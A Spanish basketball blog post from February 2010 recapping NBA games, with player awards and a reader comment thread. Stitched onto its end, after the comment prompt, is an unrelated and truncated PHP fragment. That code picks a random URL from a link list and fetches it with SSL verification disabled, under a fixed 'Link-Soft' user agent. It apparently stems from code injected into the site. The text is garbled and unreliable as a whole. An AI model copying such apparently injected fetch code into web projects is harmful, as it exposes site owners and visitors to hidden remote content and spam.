La Crónica (21/02/2010)

22 de February de 2010 por telekoman

Dos partidos acaparaban toda la atención de esta larga jornada de domingo.

Había muchas preguntas a contestar en el choque Cleveland – Orlando. Unas quedaron contestadas, otras no. ¿Conseguiría Cleveland salir del bache en el que ha entrado  tras el trade daylimit? Las respuesta es un no rotundo. Tercera derrota consecutiva de los de Lebron. ¿Conseguiría Jamison ir entrando en la dinámica del equipo? A esta podríamos contestar que sí. 19 puntos con buenos porcentajes y 8 rebotes parecen una buena señal aunque las 6 faltas personales nos dicen que todavía no está del todo fino. ¿Quién merece más el apelativo de Superman, O’Neal o Howard? A tenor de lo visto hoy parece que el relevo está ahí, pero que O’Neal se resiste a dejar el puesto. 20 puntos de Big Diesel por 22 de Howard parece un empate técnico aunque claro, a los puntos de el de Orlando hay que añadir los 16 rebotes de rigor. ¿Es capaz Orlando de desactivar a Lebron? No, ni creo que ningún equipo sea capaz. Los 33 puntos, 9 rebotes y 6 asistencias lo atestiguan, pero como el resto de la Liga, es más fácil parar al resto de sus compañeros. Conclusiones: Tendremos que esperar a los Playoffs para ver quien prima en el Este.

En el otro gran choque, Denver se consolida como el mata-gigantes del Este. Ha conseguido ganar a los 3 primeros de la clasificación de la Conferencia Este con solvencia. Su problema es más de concentración (o ego) frente a los equipos menores. Hoy se ha merendado a los Celtics con 49 puntos a repartir entre Melo y Billups. Los dos equipos nos ofrecieron un último cuarto impresionante con 32 puntos cada uno. En este punto hay que destacar los 16 puntos conseguidos por J.R. Smith, la mitad de los de su equipo, con 5 triples impresionantes. Boston ha mostrado una debilidad interior que le va a complicar mucho la vida cuando lleguen los partidos importantes.

En el Oeste hemos tenido otros dos partidos importantes. Por un lado New Orleans se ha desecho con mucha facilidad de unos Rockets en los que 3 de sus titulares no han pasado de 8 puntos. A tenido que ser el rookie Budinger el que ha anotado con mayor facilidad convirtiendo 7 de sus 11 tiros para conseguir 18 puntos. Kevin Martin, flamante fichaje de Houston, ha notado el proceso de adaptación pero ha conseguido 13 puntos. Por los Hornets nuevamente Darren Collison se ha disfrazado de Chris Paul y ha conseguido 26 puntos y repartido 9 asistencias y junto a David West se han convertido en los lideres de se equipo. Habrá que ver que pasa con este chico cuando Paul regrese. Sin duda son ahora mismo la mejor dupla de bases de la NBA. Y en el otro, Utah y Portland han tenido que llegar a la prórroga para determinar que los de Salt Lake City son mejor equipo. 22 puntos y 23 rebotes del amigo Boozer para contrarestar por un lado los 18 rebotes de Camby y los 23 puntos de Roy.

Del resto de partidos poco que contar. Memphis corta su racha negativa tras pasar por los recuperadores Nets, San Antonio se vuelve a estrellar, esta vez contra Detroit, gracias a los 27 de Hamilton y a la ausencia de Parker. Oklahoma gana con algo de suspense final a Minnesotta con 32 puntos de Durant y un gran triple doble de Westbrook. Por los Timberwolves hay que destacar la falta de presencia de un jugador como Al Jefferson, del que todos esperábamos más. Bien Flynn y Kevin Love. Los Warriors ganaron a Atlanta con un gran último cuarto. Los 32 puntos y 9 rebotes de Stephen Curry estuvieron estupendamente acompañados por los 26 de Monta Ellis. En los Hawks Joe Johnson se fue hasta 31 puntos, mientras que Al Horford hizo el mejor partido de la temporada con 26 puntos y 11 rebotes. Pero el corto banquillo de los de Atlanta fue un losa. Y por último los Suns no tuvieron rival en los remozados Kings.

PREMIOS

MVP: Dejaremos que el premio gordo se lo lleve Russell Westbrook gracias a su triple doble de 22 puntos, 10 rebotes y 14 asistencias, pese a que su compañero Kevin Durant ha anotado más que él.

Rookie: La cosecha de bases de este año está siendo espectacular. Tyreke, Flynn, Curry o Collison están respondiendo estupendamente a las expectativas. Hoy el premio se lo lleva Stephen Curry gracias a sus 32 puntos y 9 asistencias. Ricky va a tener que sudar tinta cuando recale por aquí

La sorpresa: En 14 puntos dejaron los Warriors a los Hawks en el último cuarto. Sí, no nos hemos vuelto locos. Los de Don Nelson defendiendo, y defendiendo bien.

La decepción: Los 10 puntos de Al Jefferson o los 8 de Richard Jefferson los sitúan a ambos en las decepciones de la jornada. Se espera mucho más de ambos, en especial del jugador de los Spurs.

Mayor esfuerzo en vano. Vemos por estos lares a Lebron James, como siempre que pierde Cleveland. En esta ocasión con 33 puntos, 9 rebotes y 6 asistencias, ahí es nada.

Comenta

12 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    Durant y Westbrook estan imparables!

    Y lo de Portland ha sido de traca, vaya ultimo cuarto… el parcial de los Jazz ha sido de escandalo.

      Citar

  2. Viva_Dirk dice:
    #2

    Los Jazzs con Kirilenko a buen nivel son un equipo peligrosísimo, el Oeste es ahora mucho mas duro que hace 12 meses. Y Denver en el Este sería lider de conferencia, he dicho.

      Citar

  3. sayim dice:
    #3

    Estoy de acuerdo contigo, Viva_Dirk. Creo que existe una corriente de pensamiento en algunos foros de que el este es ahora por lo menos tan fuerte como el oeste, sobre todo a partir del nivel de cavs, magic y celtics, pero yo no lo creo… Ganar partidos perteneciendo a la conferencia oeste es mucho mas dificil. Dejo una pregunta, donde estarían Rockets(a pesar del bajon) o Grizzlies si jugaran en la conferencia este? Quintos, sextos? A mi me parecen equipos bastante mas solidos que Toronto o Chicago….

    Alguien tiene dudas de que estos Thunder son por lo menos segunda ronda ya este año y que en los proximos pueden llegar a ser candidatos?

    Un saludo

      Citar

  4. aro_pasado_no_newtoniano dice:
    #4

    resulta díficil hacer comentarios sobre Portland y no decir “Roy-sistema”??

      Citar

  5. pcerezo dice:
    #5

    Ojo al Oeste, mucho ojo, porque llega el momento de las lentejas y equipos como Denver y Jazz están tremendos y son plantillas tremendas. Dallas se ha reforzado y todos esperamos una mejora de Spurs.
    Los Lakers van a sudar y en marzo juegan 14 partidos fuera de casa. Veremos…
    Sin duda el Oeste es tremendo en comparación con el solar que es el Este a partir del cuarto puesto, Atlanta no ganaría tantos partidos en el Oeste y estaría luchando septima u octava posición.
    Lo que sí está claro es que los tres mejores del este son mejores que los tres mejores del este hace unos años.

    Todavía estoy convencido que Jamison va a hacer bastante mejores a los Cavs.

    Un saludo,
    Pablo

      Citar

  6. sergio dice:
    #6

    Jamison claro que hara mejores a los Cavs, pero sigo pensando que la posicion de 4 era la que mejor cubierta tenian.

    Denver, Dallas y Jazz son mejores equipos que Boston y Orlando a mi parecer. O al menos tanto como ellos… Quizas los equipos que vienen detras esten mas parejos pero tampoco creo que Atlanta sea inferior a Grizzlies, Thunders,…

    Yo no me aventuraria a decir que los de Oklahoma son 2ª ronda… no por calidad, si no porque estan muuuuy caras las plazas. Creo que, al igual que en Este estan mas o menos claras, para el Oeste tienen pinta de pertenecer a Dallas, Denver, Los Angeles y Utah. Eso si, cualquier enfrentamiento entre ellos va a ser una autentica batalla. Creo que estos van a ser los Playoffs mas interesantes desde hace mucho tiempo..

      Citar

  7. pcerezo dice:
    #7

    Por cierto como mola la foto de McGrady con esa sonrisa socarrona…”Por qué todos los jugones sonríen igual?”, y que bien le sienta la camiseta de los Knicks, viéndola me ha venido a la memoria al añorado Montes, como le hubiera gustado ver a McGrady con la camiseta de su equipo.

    Se me ha ocurrido una chorrada pero voy a deciros mi quinteto sentimental desde que veo NBA (mediados de los ochenta), sé que no es el mejor pero es el de los tíos que mejor me han caído de todos estos años: Isiah Thomas, Tracy McGrady, Chris Mullin, Pau Gasol y Olajuwon…

    Un saludo,
    Pablo

      Citar

  8. Love Denise dice:
    #8

    en la última decada, el oeste siempre ha sido más fuerte que el este. sobre este año, Equipos como rockets, o Grizzlies podrían ir quintos en el este y sin embargo van a sudar muchísimo para clasificarse para PO.
    Que partidazo el Orlando-Cleveland, parece que Van Gundy ya ha dado con la tecla, y ordena a que le metan balones a Howard ahí dentro, y Carter ya va cogiendo la forma. Sobre los Cavs, me gustó Jamison, me parece que le aporta un 4 abierto capaz de tirar de tres y defender a otros “4” abiertos. Antes ni varejao, Ilgauskas o Hickson podían salir a defender a 7 metros. Lebron James imparable, el jugador más completo sin duda de la liga.

      Citar

  9. sergio dice:
    #9

    Yo tengo algo de mono de trivial eeee

    Para quitarmelo voy a lanzar una pregunta… ¿quien es el maximo anotador de la historia sin una sola aparicion en Playoffs?

      Citar

  10. kabom dice:
    #10

    Vaya empanada de portland en el ultimo cuarto, vale que los Jazz luchan siempre, pero dejarse perder asi..
    Al trivial, shareef abdul-rahim quizá? es que esta el segundo en partidos sin apariciones en playoff, pero me suena k en sacramento si jugo playoffs antes d retirarse

      Citar

  11. TheDeerHunter dice:
    #11

    Es porque tenemos overbooking de artículos…
    ¿puede ser un tal Tom Van Arsdale?? El tipo metió más de 15 ppp durante más de 20 años entre 1965 y el 77 cuando se retiró. Jugó en Detroit, Philadelphia, Atlanta o Phoenix, pero cuando estaba él no se comían un torrao.
    Sus mejores años los hizo en los Cincinatti Royals, donde llegó a ser all star.

      Citar

  12. sergio dice:
    #12

    Totalmente correcto Deer… siento no haber contestado antes pero es q tengo ciertos problemas con internet…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>